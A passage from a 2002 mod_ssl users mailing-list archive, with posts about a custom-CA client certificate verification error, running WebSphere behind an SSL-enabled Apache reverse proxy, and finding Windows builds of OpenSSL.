X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA07311
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Jo=E3o_Serras_Rodrigues?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'm having some problems using my own CA for user authentication in Apache modssl, win32.
Everything works fine with a demo certificate issued by GlobalSign but when I try with a certificate issued by by own CA I get Invalid Certificate.
Here are the Logs Files:

OK:

+-------------------------------------------------------------------------+
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1294): Certificate Verification: depth: 3, subject: /C=BE/O=GlobalSign nv-sa/OU=Root CA/CN=GlobalSign Root CA, issuer: /C=BE/O=GlobalSign nv-sa/OU=Root CA/CN=GlobalSign Root CA
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1294): Certificate Verification: depth: 2, subject: /C=BE/O=GlobalSign nv-sa/OU=Primary Class 1 CA/CN=GlobalSign Primary Class 1 CA, issuer: /C=BE/O=GlobalSign nv-sa/OU=Root CA/CN=GlobalSign Root CA
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1294): Certificate Verification: depth: 1, subject: /C=BE/O=GlobalSign nv-sa/OU=Class 1 CA/CN=GlobalSign Class 1 CA, issuer: /C=BE/O=GlobalSign nv-sa/OU=Primary Class 1 CA/CN=GlobalSign Primary Class 1 CA
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1294): Certificate Verification: depth: 0, subject: /CN=joao.srodrigues@optimus.pt/Email=joao.srodrigues@optimus.pt, issuer: /C=BE/O=GlobalSign nv-sa/OU=Class 1 CA/CN=GlobalSign Class 1 CA
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read client certificate A
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read client key exchange A
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read certificate verify A
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_io.c(1027): OpenSSL: read 5/5 bytes from BIO#bogus %p[mem: bogus %p (QÑoðUÐoàaX
[Tue Jul 16 16:19:59 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_io.c(974): +-------------------------------------------------------------------------+

NOT OK:

+-------------------------------------------------------------------------+
[Tue Jul 16 16:23:47 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1294): Certificate Verification: depth: 1, subject: /C=PT/L=Lisboa/O=Optimus/OU=DT/Networks/IPS/CN=PosNet CA/Email=joao.srodrigues@optimus.pt, issuer: /C=PT/L=Lisboa/O=Optimus/CN=OptimusCA
[Tue Jul 16 16:23:47 2002] [error] Certificate Verification: Error (24): invalid CA certificate
[Tue Jul 16 16:23:48 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1864): OpenSSL: Write: SSLv3 read client certificate B
[Tue Jul 16 16:23:48 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1883): OpenSSL: Exit: error in SSLv3 read client certificate B
[Tue Jul 16 16:23:48 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1883): OpenSSL: Exit: error in SSLv3 read client certificate B
[Tue Jul 16 16:23:48 2002] [error] SSL handshake failed (server jsrodrigues.optimus.pt:443, client 172.2.2.135)
[Tue Jul 16 16:23:48 2002] [error] SSL Library Error: 336105650 error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned
[Tue Jul 16 16:23:48 2002] [info] Connection to child 145 established (server jsrodrigues.optimus.pt:443, client 172.2.2.135)
[Tue Jul 16 16:23:48 2002] [info] Seeding PRNG with 0 bytes of entropy
[Tue Jul 16 16:23:48 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1846): OpenSSL: Handshake: start
[Tue Jul 16 16:23:48 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_kernel.c(1854): OpenSSL: Loop: before/accept initialization
[Tue Jul 16 16:23:48 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_io.c(1027): OpenSSL: read 11/11 bytes from BIO#bogus %p[mem: bogus %p (QÑoðUÐoà«\
[Tue Jul 16 16:23:48 2002] [debug] C:\40_Prt1.Bak\Internet\temp\httpd-2.0.39-win32-src\apache\modules\ssl\ssl_engine_io.c(974): +-------------------------------------------------------------------------+

Can anyone helpme please!

  João Rodrigues
  ______________________
  Optimus - DT/Networks/IPS
  Tel: +351 931003838
  Tm: +351 931013838
  Fax: +351 931023838
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 19:58:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15537; Tue, 16 Jul 2002 19:57:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id TAA15482; Tue, 16 Jul 2002 19:56:23 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6GHtYIP000636
	for ; Tue, 16 Jul 2002 13:55:34 -0400
Date: Tue, 16 Jul 2002 13:55:34 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache & Websphere application server
In-Reply-To: <200207160904.AA1089143348@lopette.org>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 16 Jul 2002, arcean wrote:

> my probleme is : i don't have the source code of the websphere plugin ...
>
> do you know a way to use mod_ssl without compiling apache
> or compiling apache to perfectly support the old way DSO module ??

You'll have to either get IBM to provide you with an EAPI-compiled
WebSphere DSO or set up two copies of Apache, one SSL and one non-SSL.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 19:59:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15634; Tue, 16 Jul 2002 19:58:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id TAA15613; Tue, 16 Jul 2002 19:57:58 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6GHv9nG000639
	for ; Tue, 16 Jul 2002 13:57:09 -0400
Date: Tue, 16 Jul 2002 13:57:09 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: "'modssl-users@modssl.org'" 
Subject: Re: mod_ssl & mod_auth_radius
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 16 Jul 2002, Andries, Bert wrote:

> It also will fix the problem that apache does not send a Set-Cookie
> header back to the client in case the page requsted has not changed
> (Return code 304) HTTP_NOT_MODIFIED.

I'll point out that that's not a bug, it's required by the RFC.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 20:10:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA17159; Tue, 16 Jul 2002 20:09:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id UAA17044; Tue, 16 Jul 2002 20:08:13 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id <3M9MLZCK>; Tue, 16 Jul 2002 11:08:06 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D20DA@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache & Websphere application server
Date: Tue, 16 Jul 2002 11:07:57 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I haven't used at websphere in over a year, but look to see if they included
2 dso's: one for ssl and one for non-ssl. 

I know that BEA and others do this, but I can't recall if IBM does or not.

David Marshall

-----Original Message-----
From: arcean [mailto:arcean@lopette.org]
Sent: Tuesday, July 16, 2002 9:05 AM
To: modssl-users@modssl.org
Subject: Apache & Websphere application server


hello *,

I trying to make apache, SSL and Websphere works together ...

and i have the "famous" probleme
"loaded DSO /apps/[..]/mod_app_server.so uses plain Apache api ... this
module migth crash ... re compile it with -DEAPI "

my probleme is : i don't have the source code of the websphere plugin ...

do you know a way to use mod_ssl without compiling apache 
or compiling apache to perfectly support the old way DSO module ??

thanx by advance
--
arno



__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 23:56:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA29135; Tue, 16 Jul 2002 23:55:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id XAA29111; Tue, 16 Jul 2002 23:54:48 +0200 (MET DST)
Date: Tue, 16 Jul 2002 15:00:30 -0700
Message-Id: <200207161500.AA1636630572@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: Re: Apache & Websphere application server
X-Mailer: 
X-IMSTrailer: __IMail_5__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

---------- Original Message ----------------------------------
From: Cliff Woolley 
Reply-To: modssl-users@modssl.org
Date:  Tue, 16 Jul 2002 13:55:34 -0400 (EDT)

>On Tue, 16 Jul 2002, arcean wrote:
>
>> my probleme is : i don't have the source code of the websphere plugin ...
>>
>> do you know a way to use mod_ssl without compiling apache
>> or compiling apache to perfectly support the old way DSO module ??
>
>You'll have to either get IBM to provide you with an EAPI-compiled
>WebSphere DSO or set up two copies of Apache, one SSL and one non-SSL.

yes i've think about this (when i was testing)
but the point is : I need to provide Https pages with Websphere
and i need to use Apache as "front" server
a friend of me has opened a "Ticket" with IBM ...
i pray to have a EAPI mod_app_server in return ...

>--Cliff



__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 00:15:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA00789; Wed, 17 Jul 2002 00:14:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id AAA00749; Wed, 17 Jul 2002 00:13:22 +0200 (MET DST)
Received: from node13.unix.virginia.edu by mail.virginia.edu id aa17758;
          16 Jul 2002 18:13 EDT
Received: from localhost (jcw5q@localhost)
	by node13.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id SAA31802
	for ; Tue, 16 Jul 2002 18:13:19 -0400
X-Authentication-Warning: node13.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Tue, 16 Jul 2002 18:13:19 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: Apache & Websphere application server
In-Reply-To: <200207161500.AA1636630572@lopette.org>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 16 Jul 2002, arcean wrote:

> yes i've think about this (when i was testing)
> but the point is : I need to provide Https pages with Websphere
> and i need to use Apache as "front" server
> a friend of me has opened a "Ticket" with IBM ...
> i pray to have a EAPI mod_app_server in return ...

If that doesn't work out, you can just configure it [with rewriterules or
with proxypassreverse] so that the SSL-aware Apache will act as a reverse
proxy for the non-SSL websphereized Apache.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 01:05:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA03300; Wed, 17 Jul 2002 01:04:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from odin.its.uow.edu.au id BAA03061; Wed, 17 Jul 2002 01:03:40 +0200 (MET DST)
Received: from mimir.its.uow.edu.au (mimir.its.uow.edu.au [130.130.68.27])
	by odin.its.uow.edu.au (8.12.3/8.12.3) with ESMTP id g6GN3bmE007481
	for ; Wed, 17 Jul 2002 09:03:38 +1000 (EST)
Received: from chac.its.uow.edu.au (chac.its.uow.edu.au [130.130.68.5])
	by mimir.its.uow.edu.au (Mirapoint Messaging Server MOS 2.9.3.2)
	with ESMTP id ADE75036;
	Wed, 17 Jul 2002 09:03:37 +1000 (EST)
Received: (from sendmail@localhost)
	by chac.its.uow.edu.au (8.12.3/8.12.3) id g6GN3b9T019722
	for ; Wed, 17 Jul 2002 09:03:37 +1000 (EST)
Received: from wumpus.its.uow.edu.au(130.130.68.12)
	via SMTP by chac.its.uow.edu.au, id smtpdxWa4GM; Wed Jul 17 09:03:36 2002
Received: (from blloyd@localhost)
	by wumpus.its.uow.edu.au (8.12.3/8.12.3) id g6GN3aM2011240
	for modssl-users@modssl.org; Wed, 17 Jul 2002 09:03:36 +1000 (EST)
Date: Wed, 17 Jul 2002 09:03:36 +1000
From: Brendan Lloyd 
To: modssl-users@modssl.org
Subject: Re: Mod_SSL for Windows 2000/NT/XP
Message-ID: <20020717090336.A8667@uow.edu.au>
References: <20020715164214.A3671@uow.edu.au> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: ; from gfk@logidac.com on Mon, Jul 15, 2002 at 02:08:37PM -0400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brendan Lloyd 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I wrote:
> >My situation is like Ike's: I too need to install mod_ssl and Open_SSL
> >(ie. require secure web transaction capabilities) [on a Windows machine]
> >is there a site from which I can download precompiled versions of (or
> >an "installation Wizard" for) the above?

Guillaume replied:
> I guess this is what you're looking for:
> http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip

I'm somewhat confused.

I downloaded and uncompressed the above archive, uncompressed and was
delighted to find that mod_ssl was present in the modules directory.

But I couldn't find any openssl.exe and, from what I gather, I need this
executable/toolkit to generate a key pair and CSR?

I'm a bit new to web server security and have just had responsibility
thrust upon me, so I thank you all for your patience :)

Kind regards,
Brendan Lloyd

--------------------------------------------------------------------
       I n f o r m a t i o n   S y s t e m s   A n a l y s t
Wollongong UniCentre  PO BOX U100  University of Wollongong NSW 2522
     (02) 4221-8022   fax: (02) 4221-8026   blloyd@uow.edu.au
--------------------------------------------------------------------
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 07:31:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA20494; Wed, 17 Jul 2002 07:30:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpzilla1.xs4all.nl id HAA20463; Wed, 17 Jul 2002 07:29:38 +0200 (MET DST)
Received: from xerxes2 (213-84-222-81.adsl.xs4all.nl [213.84.222.81])
	by smtpzilla1.xs4all.nl (8.12.0/8.12.0) with SMTP id g6H5TW3x077230
	for ; Wed, 17 Jul 2002 07:29:38 +0200 (CEST)
Message-ID: <002a01c22d52$b26fba30$0501a8c0@xerxes2>
From: "M.E. Post" 
To: 
References: <20020715164214.A3671@uow.edu.au>  <20020717090336.A8667@uow.edu.au>
Subject: Re: Mod_SSL for Windows 2000/NT/XP
Date: Wed, 17 Jul 2002 07:27:46 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "M.E. Post" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

----- Original Message -----
From: "Brendan Lloyd" 
To: 
Sent: Wednesday, July 17, 2002 1:03 AM
Subject: Re: Mod_SSL for Windows 2000/NT/XP


> I wrote:
> > >My situation is like Ike's: I too need to install mod_ssl and Open_SSL
> > >(ie. require secure web transaction capabilities) [on a Windows
machine]
> > >is there a site from which I can download precompiled versions of (or
> > >an "installation Wizard" for) the above?
>
> Guillaume replied:
> > I guess this is what you're looking for:
> >
http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Wi
n32.zip
>
> I'm somewhat confused.
>
> I downloaded and uncompressed the above archive, uncompressed and was
> delighted to find that mod_ssl was present in the modules directory.
>
> But I couldn't find any openssl.exe and, from what I gather, I need this
> executable/toolkit to generate a key pair and CSR?
>
> I'm a bit new to web server security and have just had responsibility
> thrust upon me, so I thank you all for your patience :)

Have a look at OpenSA (www.opensa.org), it's a Windows distribution
containing Apache, OpenSSL, PHP etc... in a precompiled state with a Windows
Installer.

hth

Meint

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 07:42:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA20920; Wed, 17 Jul 2002 07:41:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from odin.its.uow.edu.au id HAA20893; Wed, 17 Jul 2002 07:40:13 +0200 (MET DST)
Received: from mimir.its.uow.edu.au (mimir.its.uow.edu.au [130.130.68.27])
	by odin.its.uow.edu.au (8.12.3/8.12.3) with ESMTP id g6H5eBmE015583
	for ; Wed, 17 Jul 2002 15:40:11 +1000 (EST)
Received: from chac.its.uow.edu.au (chac.its.uow.edu.au [130.130.68.5])
	by mimir.its.uow.edu.au (Mirapoint Messaging Server MOS 2.9.3.2)
	with ESMTP id ADF01107;
	Wed, 17 Jul 2002 15:40:10 +1000 (EST)
Received: (from sendmail@localhost)
	by chac.its.uow.edu.au (8.12.3/8.12.3) id g6H5eAuU019893
	for ; Wed, 17 Jul 2002 15:40:10 +1000 (EST)
Received: from wumpus.its.uow.edu.au(130.130.68.12)
	via SMTP by chac.its.uow.edu.au, id smtpdQvaaWM; Wed Jul 17 15:40:08 2002
Received: (from blloyd@localhost)
	by wumpus.its.uow.edu.au (8.12.3/8.12.3) id g6H5e8d2009949
	for modssl-users@modssl.org; Wed, 17 Jul 2002 15:40:08 +1000 (EST)
Date: Wed, 17 Jul 2002 15:40:08 +1000
From: Brendan Lloyd 
To: modssl-users@modssl.org
Subject: Re: Mod_SSL for Windows 2000/NT/XP
Message-ID: <20020717154008.A9519@uow.edu.au>
References: <20020715164214.A3671@uow.edu.au>  <20020717090336.A8667@uow.edu.au> <002a01c22d52$b26fba30$0501a8c0@xerxes2>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <002a01c22d52$b26fba30$0501a8c0@xerxes2>; from meint.post@bigfoot.com on Wed, Jul 17, 2002 at 07:27:46AM +0200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brendan Lloyd 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Brendan wrote:
> > I downloaded and uncompressed the above archive, uncompressed and was
> > delighted to find that mod_ssl was present in the modules directory.
> >
> > But I couldn't find any openssl.exe and, from what I gather, I need this
> > executable/toolkit to generate a key pair and CSR?
> >
> > I'm a bit new to web server security and have just had responsibility
> > thrust upon me, so I thank you all for your patience :)

Thanks all, everything now solved (thanks in large part to the realisation
that all the stuff needed is under http://www.modssl.org/contrib AND the
help of a kind soul named Mark Anderson in Queensland Australia).

Thanks again & kind regards,
Brendan Lloyd
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 10:51:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA00977; Wed, 17 Jul 2002 10:50:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA00922; Wed, 17 Jul 2002 10:49:12 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C19E14CE752; Wed, 17 Jul 2002 10:49:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BEAE1286E5; Wed, 17 Jul 2002 10:39:49 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.cbbanorte.com.mx id AAA01979; Wed, 17 Jul 2002 00:38:39 +0200 (MET DST)
Received: from pernt02.cbbanorte.com.mx (pernt02.cbbanorte.com.mx [200.10.246.202])
	by pluto.cbbanorte.com.mx (8.11.3/8.11.3) with ESMTP id g6GLblL25804;
	Tue, 16 Jul 2002 16:37:47 -0500
Received: by pernt02.cbbanorte.com.mx with Internet Mail Service (5.5.2653.19)
	id <38YNAPSK>; Tue, 16 Jul 2002 17:32:47 -0500
Message-ID: 
From: "Marco A. Zamora Cunningham" 
To: "'modssl-users@modssl.org'" 
Cc: "'arcean@lopette.org'" 
Subject: RE: Apache & Websphere application server
Date: Tue, 16 Jul 2002 17:32:47 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marco A. Zamora Cunningham" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> >You'll have to either get IBM to provide you with an EAPI-compiled
> >WebSphere DSO or set up two copies of Apache, one SSL and 
> one non-SSL.
> 
> yes i've think about this (when i was testing)
> but the point is : I need to provide Https pages with Websphere
> and i need to use Apache as "front" server

You can always put up the SSL-aware Apache in front of the non-SSL Websphere
one:

Config inside the "frontmost" SSL Apache:
  ProxyPass          /  http://127.0.01:/
  ProxyPassReverse   /  http://127.0.01:/

And set up the "backend" Websphere one to listen only on the loopback
interface:
  Listen 127.0.0.1:

(Obviously, substitute  with whatever port you'd like
it to listen on.)

Additionally, if you really need to see the IP of the connecting client on
the backend server (for example, so your access logs show the real IP), you
can do a little trick with mod_perl (provided, of course, you've got
mod_perl on both servers):

On the "front" SSL server (single line in case it wraps)[1]:

  PerlHeaderParserHandler "sub
{my($r)=shift;$r->headers_in->add('X-Forwarded-For'=>$r->connection->remote_
ip())}"

On the "back" Websphere server (also on a single line)[2]:

  PerlHeaderParserHandler "sub
{my($r)=shift;$r->connection->remote_ip((split(/,\s*/,$r->headers_in->merge(
'X-Forwarded-For')))[-1])}"

In case there isn't mod_perl on the backend server, there might be some
other way to act on the standard proxying "X-Forwarded-For" header (maybe
websphere can do it by itself?).

Hope it helps...			Marco Zamora

[1] Note for mod_perl-heads: Yes, it really is "$r->headers_in". Remember
that on proxy connections, the INcoming headers are the ones forwarded on to
the target server.

[2] The fancy "(split[...]merge)[-1]" stuff is just a way of parsing out the
*last* IP in the possible chain of X-Forwarded-For headers. We can't just
use the header_in method because it returns the first one.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 11:01:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA01914; Wed, 17 Jul 2002 11:00:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id KAA01771; Wed, 17 Jul 2002 10:59:30 +0200 (MET DST)
Date: Wed, 17 Jul 2002 02:05:12 -0700
Message-Id: <200207170205.AA167051714@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: Re: Mod_SSL for Windows 2000/NT/XP
X-Mailer: 
X-IMSTrailer: __IMail_5__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

---------- Original Message ----------------------------------
>> I guess this is what you're looking for:
>> http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip
>
>I'm somewhat confused.
>I downloaded and uncompressed the above archive, uncompressed and > was delighted to find that mod_ssl was present in the modules 
> directory.
>
>But I couldn't find any openssl.exe and, from what I gather, I 
> need this

www.openssl.org/download/win32 ?? :)
 
>executable/toolkit to generate a key pair and CSR?
>I'm a bit new to web server security and have just had 
>responsibility
>thrust upon me, so I thank you all for your patience :)

>Kind regards,
>Brendan Lloyd



__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 11:09:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA02782; Wed, 17 Jul 2002 11:08:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id LAA02734; Wed, 17 Jul 2002 11:08:01 +0200 (MET DST)
Date: Wed, 17 Jul 2002 02:13:44 -0700
Message-Id: <200207170213.AA168493506@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: RE: Apache & Websphere application server
X-Mailer: 
X-IMSTrailer: __IMail_5__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

thanx a lot for all

but (yes there is a but :( )

i use Websphere to authenticate client from there certificat
